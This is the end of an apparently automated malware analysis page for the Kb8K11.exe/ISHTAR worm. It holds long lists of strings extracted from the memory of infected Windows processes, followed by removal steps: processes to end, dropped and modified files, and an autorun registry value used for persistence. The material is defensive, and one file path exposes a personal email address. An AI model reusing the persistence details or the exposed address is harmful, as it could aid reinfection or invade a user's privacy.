CVssHardwareProviderWrapper::DisknoToPhysicalDrive
\\.\PHYSICALDRIVE%u
CVssHardwareProviderWrapper::EnumeratePacksInVolmgr
CVssHardwareProviderWrapper::GetLunInformation
CVssHardwareProviderWrapper::SaveLunInformation
* PARAM %s: %s %s %s
%s %s
CVssHardwareProviderWrapper::TraceBinaryBuffer
CVssHardwareProviderWrapper::EnumerateDisksInPack
CVssHardwareProviderWrapper::DiskClosureGuidsToDiskNumbers
%s (%lu)
CVssHardwareProviderWrapper::WriteStorageIdDescriptorToBuffer
* PARAM %s: END VDS_STORAGE_IDENTIFIER %s[%d,%d]
* PARAM %s: m_rgbIdentifier:
* PARAM %s: m_cbIdentifier = %lu
* PARAM %s: m_Type = %lu (%s)
* PARAM %s: m_CodeSet = %lu (%s)
* PARAM %s: BEGIN VDS_STORAGE_IDENTIFIER %s[%d,%d]
CVssHardwareProviderWrapper::TraceVdsStorageIdentifier
* PARAM %s: END VDS_INTERCONNECT %s[%d,%d]
* PARAM %s: m_pbAddress:
* PARAM %s: m_cbAddress = %lu
* PARAM %s: m_pbPort:
* PARAM %s: m_cbPort = %lu
* PARAM %s: m_addressType = %lu
* PARAM %s: BEGIN VDS_INTERCONNECT %s[%d,%d]
CVssHardwareProviderWrapper::TraceVdsInterconnect
CVssHardwareProviderWrapper::ChangePartitionProperties
CVssHardwareProviderWrapper::LogVdsLunInfo
* PARAM %s: END VDS_STORAGE_DEVICE_ID_DESCRIPTOR %s[%d]
* PARAM %s: m_cIdentifiers = %lu
* PARAM %s: m_version = %lu
* PARAM %s: BEGIN VDS_STORAGE_DEVICE_ID_DESCRIPTOR %s[%d]
CVssHardwareProviderWrapper::TraceVdsStorageDeviceIdDescriptor
CVssHardwareProviderWrapper::SetAutoRecoverAttribute
Moving disk %d (drive %s) into DetectSnapshot state with LUN id {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Disk %d (drive %s) already entered DetectSnapshot state.
CVssHardwareProviderWrapper::MoveDiskToDetectSnapState
Moving disk %d (drive %s) into NormalDisk state
Disk %d (drive %s) already entered NormalDisk state.
CVssHardwareProviderWrapper::MoveDiskToNormalState
* PARAM %s: END VDS_LUN_INFORMATION %s[%d]
* PARAM %s: m_cInterconnects = %lu
* PARAM %s: m_diskSignature = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
* PARAM %s: m_szSerialNumber = '%hs'
* PARAM %s: m_szProductRevision = '%hs'
* PARAM %s: m_szProductId = '%hs'
* PARAM %s: m_szVendorId = '%hs'
* PARAM %s: m_BusType = %lu
* PARAM %s: m_bCommandQueueing = %lu (%s)
* PARAM %s: m_DeviceTypeModifier = %lu
* PARAM %s: m_DeviceType = %lu
* PARAM %s: m_version = %lu
CVssHardwareProviderWrapper::TraceVdsLunInfo
* PARAM %s: BEGIN VDS_LUN_INFORMATION for %s: %s[%d]
CreateFileW(%s) - BuildLunInfoForDrive
Error [0xlx] while opening LUN %s ...
CreateFileW(%s) [0xlx]
Missing LUN. Error [0xlx] while opening LUN %s ...
IOCTL_DISK_GET_DRIVE_LAYOUT_EX returned RAW partition style on %s
IOCTL_DISK_GET_DRIVE_LAYOUT_EX returned unknown partition style on %s [%d]
IOCTL_DISK_GET_DRIVE_LAYOUT_EX(%s) - BuildLunInfoForDrive
Error [0xlx] while getting the drive layout information for LUN %s ...
- END StorageDeviceIdProperty [%s]
Identifier [%d]:
Version: %u
Number of Storage Identifiers: %u
- BEGIN StorageDeviceIdProperty [%s]
Page 83 info for drive %s
SCSI Inq Page 83 failed on %s [0xlx]
Getting the Page 83 information for drive %s ...
- Bus type: %d
- Command Queueing: %d
- Device Type Modifier: %d
- Device Type: %d
Page 80 info for drive %s
IOCTL_STORAGE_QUERY_PROPERTY(%s) fails - BuildLunInfoForDrive [0xlx]
Getting the Page 80 information for drive %s ...
IOCTL_DISK_GET_SNAPSHOT_INFO(%s) - BuildLunInfoForDrive fails with [0xlx]
Finding Snapshot Info for drive %s ...
- Device number: %u
IOCTL_STORAGE_GET_DEVICE_NUMBER(%s) - BuildLunInfoForDrive
Error [0xlx] while getting the device number for LUN %s ...
Getting the device number for drive %s ...
Build LUN info for drive %s ...
CVssHardwareProviderWrapper::BuildLunInfoForDrive
Device %s for original volume %s given LUN id{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Original volume %s also lies on %s. It already has LUN id{%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
CVssHardwareProviderWrapper::WriteSnapshotInfoOnOriginalLuns
CVssHardwareProviderWrapper::RemoveSnapshotInfoFromOriginalLuns
IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS(%s) returned zero extents
Fail to open handle to volume %s hr 0xlx
CVssHardwareProviderWrapper::MoveVolumeDisksToNormalState
IOCTL_DISK_GET_SNAPSHOT_INFO fails on %s
Cannot online LUN %s. CreateFileW fails with [0xlx]
Snapshot state found: %u, expected: %u
CVssHardwareProviderWrapper::CountVolsWithDisksInState
Fail to make %s online and writable, IOCTL_DISK_SET_DISK_ATTRIBUTES fails with [0xlx]
Disk %s (disk %d) is now online and writable
CVssHardwareProviderWrapper::OnlineDisksInState
IOCTL_DISK_SET_SNAPSHOT_INFO fails for %s
CVssHardwareProviderWrapper::TransitionDisksInState
GetVolumeNameForVolumeMountPoint(%s) fail on second time. with 0xlx.
GetVolumeNameForVolumeMountPoint(%s) fails with 0xlx.
CVssHardwareProviderWrapper::GetVolumeUniqueName
IOCTL_VOLMGR_MERGE_DISKS fails. [winerror %d]
CVssHardwareProviderWrapper::MergeDisksFromSourceToTarget
Fail to find snapshot info for disk %s for this volume, returning false
Device %s is a CD-ROM and therefore is not supported. Skipping.
Build LUN info for volume %s ...
CVssHardwareProviderWrapper::BuildLunInfoFromVolume
d:\w7rtm\base\stor\vss\modules\coord\src\hwdeviceobj.cxx
- Partition no %d, starting offset 0x6I64x and PartitionId {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Found GPT disk with %d partitions and DiskId {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Disk id for disk no %d
Found local GPT disk partition %d at offset 0x6I64x matches snapshot info partition %d offset 0x6I64x with ID {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} , returning TRUE
No match found for partition %d offset 0x6I64x guid {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} matches
Partition style comparison fails %d != %d, returning FALSE
The snapshot disk format has changed partition syle, originally %d, currently %d.This is not supported. The signature will not be reverted.
ERROR - The size of this MBR disk id is %d != sizeof(VSS_DISK_ID) ?
Snap info partition no %d, starting offset 0x6I64x and PartitionId {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x} is not found anywhere on the local disk layout. The signature will not be reverted.
It matches local disk partition no %d, starting offset 0x6I64x and PartitionId {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Found snap info partition no %d, starting offset 0x6I64x and PartitionId {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
IOCTL_DISK_GET_SNAPSHOT_INFO(%s) fails
Error [0xlx] while getting the snapshot info for LUN %s ...
- Reading snapshot info (if present) for %s...
CVssHwSnapshotInfo::LoadSnapshotInfo
CVssHwSnapshotInfo not properly initialized for %s
CVssHwSnapshotInfo::GetState
IOCTL_STORAGE_GET_DEVICE_NUMBER - Error [0xlx] while getting the device number for LUN %s
Bad state of CVssHwSnapshotInfo object
CVssHwSnapshotInfo::LoadDiskNumber
Device has unsupported partition style %d. Only MBR and GPT supported.
Fail to get Disk signature/id information, IOCTL_DISK_GET_DRIVE_LAYOUT_EX fails with winerror %d
CVssHwSnapshotInfo::LoadDiskId
(%p) Received signal: (Event: %ld, Device class ID: {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}, Device: %s) - match: %s
Event: %ld, Struct size: %ld, Device class ID: {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}, Device: %s)
CreateFileW(%s)
CreateFileW(%s) fails [%#x]
CreateFileW(%s) == 0xlx
- Opening Disk: %s ...
CVssHwSnapshotInfo::Initialize
IOCTL_DISK_SET_SNAPSHOT_INFO(%s) fails with winerror %d
CVssHwSnapshotInfo::Save
Integer overflow - cannot support that many disks
Reallocating for internal storage, m_dwCurrentCapacity %d m_dwDisksFound %d
Device type: %d
SetupDiGetDeviceInterfaceDetail(devInfo, &, NULL, 0, &, NULL) fails winerror %d
SetupDiGetDeviceInterfaceDetail(devInfo, &, detail, dwBytes, NULL, &) fails winerror %d
SetupDiEnumDeviceInterfaces(devInfo, NULL, &, [%d], &) fails winerror %d
Found existing device path: %s
Failed to compute disk path for disk no %d [0lx]
Check failed - we do not support signature revert on dynamic disks in SP1 and Longhorn Server
Checking if safe to revert signature on disks on volume %s
No disk id found for disk %d
Unable to get the drive layout of %s. Could be a USB drive or other media
Unable to open the disk handle of %s.
Device path: %s
Lun info of disks %s not expected. Ignoring.
d:\w7rtm\base\stor\vss\modules\coord\src\hwresync.cxx
CVssHardwareProviderWrapper::OnDiskFoundPostResync
CVssHardwareProviderWrapper::CheckNotDynamicSnapshot
CVssHardwareProviderWrapper::CheckThisProviderOwnsSnapshot
CVssHardwareProviderWrapper::CheckThisProviderSupportsResync
Found identifier %d as unique type.
CVssHardwareProviderWrapper::CheckDestUniqueStorageIdentifiers
CVssHardwareProviderWrapper::FindQuorumFlagProperty
ClusterResourceControl fails CLUSCTL_RESOURCE_GET_FLAGS with winerror %d
CVssHardwareProviderWrapper::CheckResyncCancel
CVssHardwareProviderWrapper::CheckIsOnlineOnMachine
ClusterResourceControl succeeds to put disk %d %s maintenance mode
%s operation Disk %d winerror %d
ClusterResourceControl fails to put disk %d %s maintenance mode winerror %d
CVssHardwareProviderWrapper::PutClusteredDiskMM
CVssHardwareProviderWrapper::InitializeRecoverSet
CVssHardwareProviderWrapper::GetSnapshotFromSnapshotSet
CVssHardwareProviderWrapper::CloseDiskHandles
Wait operation timed out without exposing required disks, attempt %d.
CVssHardwareProviderWrapper::ExposeResyncedDestinationDisks
IOCTL_DISK_SET_SNAPSHOT_INFO(%s) fails with 0xlx
IOCTL_DISK_GET_SNAPSHOT_INFO(%s) fails with 0xlx
CVssHardwareProviderWrapper::ChangeSnapshotState
CVssHardwareProviderWrapper::LogSecurityAuditsForLunResync
Failed to put all cluster resources %s maintenance mode.
CVssHardwareProviderWrapper::PutClusteredDestinationsMM
CVssHardwareProviderWrapper::CloseClusterResourceHandles
IOCTL_DISK_SET_DISK_ATTRIBUTES(%s) failed - possibly one of the resync destinations is used by another program exclusively, it couldn't be offlined. Abort resync.
CVssHardwareProviderWrapper::OfflineResyncDisks
ERROR - IOCTL_DISK_SET_DISK_ATTRIBUTES(%s) failed to online post resync with 0xlx. The disk might be exclusively in use.
CVssHardwareProviderWrapper::MakeOnlineWritable
CVssHardwareProviderWrapper::SetInternalProviderResyncItf
CVssHardwareProviderWrapper::PerformProviderResync
CVssHardwareProviderWrapper::CancelProviderResync
CVssHardwareProviderWrapper::CancelRecoverSet
Wait operation timed out without finding all volumes.
Need to wait for %d volumes.
CVssHardwareProviderWrapper::ExposeResyncedVolumes
CVssHardwareProviderWrapper::GetDiskExtentForVolume
Terminal error - resync destination %s went unusable winerror %d. Abort resync.
CreateFile(%s)
CVssHardwareProviderWrapper::ReopenDisksExclusive
ERROR - No disk id found for disk %d
DiskId of disk number %d successfully reverted to snapshot source value.
ERROR - Could not revert diskId of disk %d to pre-resync value.
DiskId of disk %d successfully reverted to snapshot source value.
ERROR - Could not revert diskId of disk number %d to pre-resync value.
Required diskId of disk %d is there already.
Revert of ID for disk number %d fails because the signature exists on the machine.
ERROR - Pre-Resync diskId of disk %d found on unrelated disk post-resync.
ERROR - Could not find original diskId of disk %d
Disk %d diskId was unchanged by resync (original destination). Flag indicates desired behavior.
ERROR - Disk number %d not found pre-resync.
ERROR - IOCTL_DISK_GET_DRIVE_LAYOUT_EX(%s) fails post resync with 0xlx. Cannot check signature. Trying others.
ERROR - IOCTL_DISK_UPDATE_PROPERTIES(%s) failed post resync with 0xlx. Trying others.
CVssHardwareProviderWrapper::SetDiskSignatures
DiskId of disk number %d was not the expected value.
CVssHardwareProviderWrapper::VerifyDiskSignatures
CVssHardwareProviderWrapper::RestoreResyncedVolumeAttribs
ClusterResourceControl fails getting size for CLUSCTL_RESOURCE_STORAGE_GET_DISK_INFO_EX with winerror %d
ClusterResourceControl fails CLUSCTL_RESOURCE_STORAGE_GET_DISK_INFO_EX with winerror %d
CVssHardwareProviderWrapper::FindClusteredDiskNumber
CVssHardwareProviderWrapper::ResolveResyncSourceDest
Failed to take volume %s offline [0xlx].
Couldn't dismount volume %s [0xlx].
Failed to lock volume %s [0xlx].
CVssHardwareProviderWrapper::UninstallResyncDestinationVolumes
Disk number for %s has changed post restart from %d to %d
Cannot find new disk number for %s
Error - Cannot find post-resync disk number for %s
Cannot open handle for disk %s
Error - Cannot open handle to post-resync disk %s
IsRebootRequired(%s) returned true for Disk %d
Disk %d requires a reboot in order to continue, resync cannot continue with this disk
SetupDiCallClassInstaller(DIF_PROPERTYCHANGE, %s) fails for Disk %d winerror %d
SetupDiCallClassInstaller(DIF_PROPERTYCHANGE, %s) fails to restart winerror %d
SetupDiSetClassInstallParams(%s) fails for Disk %d winerror %d
SetupDiSetClassInstallParams(%s) fails winerror %d
Restarting disk device %s
Lun info of disk %s not expected. Ignoring.
CVssHardwareProviderWrapper::RestartDiskIfResyncTarget
Found volume name %s for arrived volume
GetVolumeNameForVolumeMountPoint(%s) fail on second time. with 0xlx after matching. We cannot accept this volume
GetVolumeNameForVolumeMountPoint(%s) fails with 0xlx after matching. We cannot accept this volume
Extents for volume %s not found. Ignoring.
Lun info of volume %s not expected. Ignoring.
CVssHardwareProviderWrapper::CheckLunMatchesDestination
CVssHardwareProviderWrapper::CheckUnselectedVolume
Volume %s is on disk %d
Volume %s returns %d extents, so its a dynamic disk/volume, resync cannot involve either of them, we can ignore.
Fail to get extents for the volume %s. [0xlx].
CVssHardwareProviderWrapper::GetVolumeDiskNumber
Disk %d is not the quorum disk
Disk %d is the quorum disk
Found clustered disk %d
CVssHardwareProviderWrapper::CheckDestQuorumCallback
OpenClusterResource fails to get cluster resource handle for the resync destination %d with winerror %d
ResUtilGetResourceName fails for the resync destination %d with winerror %d
CVssHardwareProviderWrapper::ClusteredDiskCallback
Found an unselected volume on the resync destination, no ignore flag given. Rejecting resync operation.
CVssHardwareProviderWrapper::PreRecoverSet
Resync fails because one or more resync destinations could not be restarted winerror %d hresult 0xlx.
CVssHardwareProviderWrapper::RestartResyncedDestinationDisks
Dynamic volume arrival %s, cannot be for resync.
Decremented expected volume count %d --> %d
Can't build LUN info for the resync volume %s. Ignoring.
Post-resync volume %s found at rundown %d. Checking state of each extent
Volume name %s
CVssHardwareProviderWrapper::OnVolumeArrivalForResync
Found unselected volume %s on disk %d. Triggering check
Disk in recovery set, ignoring %s disk %d
Invalid volume for resync, ignoring %s
Volume in recovery set, ignoring %s
Invalid volume, ignoring %s
CVssHardwareProviderWrapper::CheckUnselectedVolumeItr
Terminal error - cannot enumerate resources in cluster last error %d. Abort resync.
Resync destination %s is not clustered so it cannot be the quorum.
IOCTL_DISK_IS_CLUSTERED(%s) failed.
Terminal error - resync destination %s unexpectedly went unusable winerror %d. Abort resync.
CVssHardwareProviderWrapper::CheckDestClusterQuorumVolume
Terminal error - cannot enumerate resources in cluster winerror %d. Abort resync.
CVssHardwareProviderWrapper::FindClusteredDestinations
The provider doesn't support the destination.
Given destination is on the cluster quorum resource, which is not supported for resync.
The owning provider doesn't support resync.
The snapshot is dynamic, not supported for Resync.
CVssHardwareProviderWrapper::AddSnapshotToRecoverySet
CVssHardwareProviderWrapper::RecoverSet
vsstrace.dll
Name: %s\%s, SID:%s
0xlx, %s
d:\w7rtm\base\stor\vss\modules\trace\fntracer.cpp
Tracing started or updated. PID=%d, CommandLine=[%s], UserName=[%s]. SQN=[%d -> %d]
HRESULT 0xlx rethrown by %s
HRESULT exception caught: hr: 0x%x
bad_alloc STL exception caught: hr: 0x%x
Unexpected STL exception caught: %s
COM Call %S failed [0xlx]
Error loading VSS.DLL resource with ID = 0xlx [0xlx]
Error loading VSS.DLL [0xlx]
Out of memory detected in function %s - %s
Unexpected error in routine %s - %s. hr = 0xlx
ERROR_DISK_FULL detected in function %s - %s
Fail to register security audit winerr %d
Fail of AuthzReportSecurityEventFromParams to log security audit winerr %d
Fail to GetTokenInformation winerr %d, HRESULT 0x%#x
Fail to find the current process token audit winerr %d
COM error caught: hr: 0x%x
Unexpected COM exception caught: hr: 0x%x
Error on ReportEventW 0xlx
Current context: '%s'
INFO: %s [hr = 0xlx]
Out of memory detected in function %s
Unexpected error in routine %s. hr = 0xlx
ERROR_DISK_FULL detected in function %s
Unexpected error in routine %s. hr = 0xlx
Unexpected error calling a provider routine: %s [hr = 0xlx] Provider ID = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Insufficient storage. %s. Provider ID = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Cannot revert DiskID. %s. Provider ID = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Volume not supported by provider. %s. Provider ID = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Snapshot id not found. %s. Provider ID = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Bad state. %s. Provider ID = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Volume not supported. %s. Provider ID = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Provider veto detected. %s. Provider ID = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Invalid argument detected. %s. Provider ID = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Out of memory detected. %s. Provider ID = {%.8x-%.4x-%.4x-%.2x%.2x-%.2x%.2x%.2x%.2x%.2x%.2x}
Out of memory detected. %s
Timeout detected. %s [hr = 0xlx]
Unexpected error: %s [hr = 0xlx]
ERROR_DISK_FULL detected. %s
Out of memory detected. %s.
Invalid device when calling a provider routine: %s
Unexpected error calling a provider routine: %s [hr = 0xlx]
Timeout error calling a provider routine: %s.
%s event failed at one writer. hr = 0xlx
WARNING: %s [hr = 0xlx]
Adding context: '%s' (%d)
Adding context: '%s' = '%s' (%d)
%s, 0xlx
%s, 0xlx, %s
(%#x) %s
d:\w7rtm\base\stor\vss\modules\filter\filter.cxx
Subscriber with SID (%s) for method (%s) was not fired.
Firing subscriber SID (%s) for method (%s)
Subscriber with SID (%s) is not allowed to fire
d:\w7rtm\base\stor\vss\modules\prop\copy.cxx
%s: Error catched 0xlx
d:\w7rtm\base\stor\vss\modules\prop\pointer.cxx
%s: Error on allocating the Properties structure
ConvertStringSidToSid(%s)
d:\w7rtm\base\stor\vss\modules\sec\security.cxx
CAutoSid::operator ==
Fail to acquire the %s privilege
LookupPrivilegeValue(%s)
m_SDBoth.Allow(...)
m_SDWriters.Allow(...)
m_SDRequestors.Allow(...)
m_SDBoth.Deny(...)
m_SDWriters.Deny(...)
m_SDRequestors.Deny(...)
Adding SID %s ...
Invalid SID passed to AddSid
LookupAccountSid returned with winerror %d, bRes %s.
NetLocalGroupGetMembers() failed for "%s" with %d
NetLocalGroupGetMemebers(%s)
LookupAccountSid fails unexpectedly, winerror %d.
LookupAccountName fails to give SID size for %s, fReturn %d, winerror %d, dwSid %d, dwDomain %d. This key value is ignored.
LookupAccountName fails unexpectedly for %s, winerror %d. Account ignored.
LookupAccountName fails for %s, winerror %d. This key value in VssAccessControl is ignored.
User %s specified under VssAccessControl key doesn't exist. This key value is ignored.
m_SDBoth.Initialize() failed
m_SDRequestors.Initialize() failed
m_SDWriters.Initialize() failed
WriterSid: %s was %s %s to fire
Software\Microsoft\Windows NT\CurrentVersion\ProfileList
d:\w7rtm\base\stor\vss\modules\writers\deletewriter.cpp
ExpandEnvironmentString(%s, %p, %d)
ExpandEnvironmentString(%s, NULL, 0)
reparse point found: %s
GetFileAttributes(%s) failed with %d
GetVolumePathName(%s) failed with %d
GetSnapshotDeviceName(%s) failed with 0xlx
StringCchCat failed with 0xlx, winerror %d
StringCchCopy failed with 0xlx, winerror %d
GetVolumePathName(%s\%s) failed with %d
skipping deletion of %s\%s since it's not included on a snapshot
FindFirstFile(%s) returned nothing
GetVolumeNameForVolumeMountPoint(%s) failed with %d
StringCchCat fails with 0xlx, winerror %d
StringCchCopy fails with 0xlx, winerror %d
StringCchPrintf fails for %s\%s with 0xlx winerror %d
FindFirstVolumeW/FindNextVolumeW fails with 0xlx winerror %d
No file given for a specification in store %s. Ignoring.
excluding file from registry at with path %s and filespec %s and recursive %d
failed to delete file %s from snapshot. Error %d
deleting file %s
Subscribing the ASR writer failed. hr = %0x08lx
d:\w7rtm\base\stor\vss\modules\writers\asrwriter.cxx
IVssWriterComponents::SetPrepareForBackupFailureMsg
CVssAsrWriterBackup::_SetBackupErrorMsg
CreateThread failed with error %d
The COM  writer was not initialized on startup. m_bCreated: %s
d:\w7rtm\base\stor\vss\modules\writers\comregdbwriter.cxx
catsrvut.dll could not be loaded. No COM  writer
catsrvut.dll
%SystemRoot%\repair
.tmp.LOG
.DEFAULT
%SystemRoot%\system32\config
Subscribing the Registry server writer failed. hr = %0x08lx
d:\w7rtm\base\stor\vss\modules\writers\regwriter.cxx
NtThawRegistry returned status %d
%SystemRoot%\System32\SMI\Store\Machine
schema.dat
d:\w7rtm\base\stor\vss\modules\registry\registry.cxx
RegSetValueExW(0xlx,%s,0,REG_BINARY,%p.%lu)
CVssRegistryKey::SetBinaryValue
Unexpected size %lu for a DWORD value 0xlx(%s),%s
Unexpected type %lu for a DWORD value 0xlx(%s),%s
Expected REG_DWORD type for registry key %s value name %s. The present value has been ignored
RegQueryValueExW(0xlx(%s),%s,0,[%lx],0,[%lu])
Registry key not found
RegQueryValueExW(0xlx(%s),%s,0,[%lx],0,[%lu]) => ERROR_FILE_NOT_FOUND
CVssRegistryKey::GetValue
Error on closing key with name %s. lRes == 0xlx
CVssRegistryKey::Close
RegEnumKeyExW(%p,%lu,%p,%lu ...)
CVssRegistryKeyIterator::GetCurrentKeyName
UNKNOWN_EVENT[0xlx] %s
Event name: %s
Key %s already exists
RegCreateKeyExW(%ld,%s,...,[%lu])
RegCreateKeyExW(%ld,%s,...)
CVssRegistryKey::Create
RegOpenKeyExW(%ld,%s,...)
CVssRegistryKey::Open
RegQueryInfoKeyW(%p, ...)
CVssRegistryKeyIterator::Attach
Unexpected type %lu for a string value 0xlx(%s),%s
Diagnose enabled for (%s)
Parameters %s
Cannot retrieve minimum diff area for volume %s [0xlx]. Using the default value %I64d
Minimum diff area size for volume %s: %I64d
System volume name: %s
GetVolumeNameForVolumeMountPointW( '%s', STRING_CCH_PARAM(wszSysVolumeName))
GetVolumePathNameW(%s, %p, %u)
GetSystemWindowsDirectoryW(%s, %u): %u [0xlx]
GetSystemWindowsDirectoryW(%s, %u): %u
g\\?\GLOBALROOT%s
nharddisk%d
CVssAsrAPIBackup::GetErrorMsg
d:\w7rtm\base\stor\vss\modules\volume\volume.cxx
ParentIsPhysical: %s
StringCchCopy - volume guid name: %s
StringCchPrintf - volume name: %s
GetStorageDependencyInformation(%s, NULL) failed to get required buffer size, %#x
VHD volume %s is surfaced from a remote machine. Parent volume path: %s
Opening volume %s
\\.\MountPointManager
NumPlexes
%d.%d
IsShared
BusKey
DAsrpIsSupportedConfiguration
\\?\GLOBALROOT\arcname\multi(0)disk(0)rdisk(0)
%s\Device\Harddisk%d\Partition%d\
e\\?\GlobalRoot
%s\Device\Harddisk%d\Partition%d
SOFTWARE\MICROSOFT\WINDOWS NT\CurrentVersion\ASR\BackupSession
SOFTWARE\MICROSOFT\WINDOWS NT\CurrentVersion\ASR\RestoreSession
netmsg.dll
kernel32.dll
%s%s(0xX)
sbp2port
Parport
d:\w7rtm\base\stor\vss\modules\backupext\vsxml\vs_xml.cxx
KeyName
BCDd
multi(%d)disk(%d)rdisk(%d)
%s\Partition%lu
multi(%d)disk(%d)rdisk(%d)partition(%d)
6.1.7601.17514 (win7sp1_rtm.101119-1850)
VSSVC.EXE
Windows
Operating System
6.1.7601.17514

Kb8K11.exe_3060_rwx_00D30000_0000B000:

|$83|$ 1

svchost.exe_3412:

.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
<description>Host Process for Windows Services</description>
<requestedExecutionLevel
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1828
    eventvwr.exe:3976
    Kb8K11.exe:2916
    Kb8K11.exe:1812
    Kb8K11.exe:2992
    Kb8K11.exe:2980
    Kb8K11.exe:1008

  2. Delete the original Worm file.
  3. Delete or disinfect the following files created/modified by the Worm:

    C:\Users\"%CurrentUserName%"\Desktop\aacc754ec9d2c845825c2e1a1518cbe5.docx (6 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.exe (15424 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\~pE6D0A8772EB1.tmp (221 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\~mE6D0A8772EB1.tmp (280 bytes)
    C:\ProgramData\VMware\VMware Tools\manifest.txt (345 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Desert.jpg (2631 bytes)
    C:\totalcmd\SIZE!.TXT (1419 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\README-ISHTAR.txt (1 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg (2152 bytes)
    C:\totalcmd\HISTORY.TXT (1613 bytes)
    C:\totalcmd\DEFAULT.BAR (2187 bytes)
    C:\ISHTAR.DATA (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\ISHTAR.DATA (143 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\googledesktop.txt (1227 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg (1398 bytes)
    C:\totalcmd\KEYBOARD.TXT (852 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\win7gadgets.txt (1035 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\vistasidebar.txt (2059 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\microsoftoffice2003.txt (1163 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\adobephotoshopcs3.txt (714 bytes)
    C:\totalcmd\NO.BAR (299 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\adobeflashcs3.txt (435 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\vmwarefilters.txt (26 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg (2252 bytes)
    C:\README-ISHTAR.txt (1 bytes)
    C:\totalcmd\REGISTER.RTF (200 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg (2389 bytes)
    C:\Users\Public\Videos\Sample Videos\Wildlife.wmv (5351 bytes)
    C:\Users\"%CurrentUserName%"\Documents\Outlook Files\mar.kus@bigmir.net.pst (608 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg (1474 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Koala.jpg (2391 bytes)
    C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg (2128 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\README-ISHTAR.txt (1 bytes)
    C:\ProgramData\VMware\VMware Tools\Unity Filters\visualstudio2005.txt (523 bytes)
    C:\Users\"%CurrentUserName%"\Desktop\ISHTAR.DATA (1 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Kb8K11.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
